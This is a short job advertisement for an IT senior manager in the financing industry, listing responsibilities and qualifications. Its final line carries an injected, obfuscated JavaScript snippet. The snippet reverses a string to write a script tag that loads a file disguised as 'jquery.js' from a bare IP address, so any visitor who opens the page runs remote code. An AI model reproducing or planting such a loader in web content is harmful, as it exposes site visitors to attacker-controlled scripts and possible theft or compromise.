Industry : Financing
– Develop technical aspects of the company’s strategy to ensure alignment with its business goals
– Discover and implement new technologies that yield competitive advantage
– Supervise system infrastructure to ensure functionality and efficiency
– Build quality assurance and data protection processes
– Monitor KPIs and IT budgets to assess technological performance
– Communicate technology strategy to partners and investors
– Degree in IT, Computer Engineering or any related discipline.
– Proven experience as a IT Senior Manager or similar leadership role
– Knowledge of technological trends to build strategy
– Understanding of budgets and business-planning
– Ability to conduct technological analyses and research
– Problem-solving aptitude
– Finance, risk management, mobile application or other relevant knowledge/working experience is a plus.
– Able to communicate in Mandarin is an advantage document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))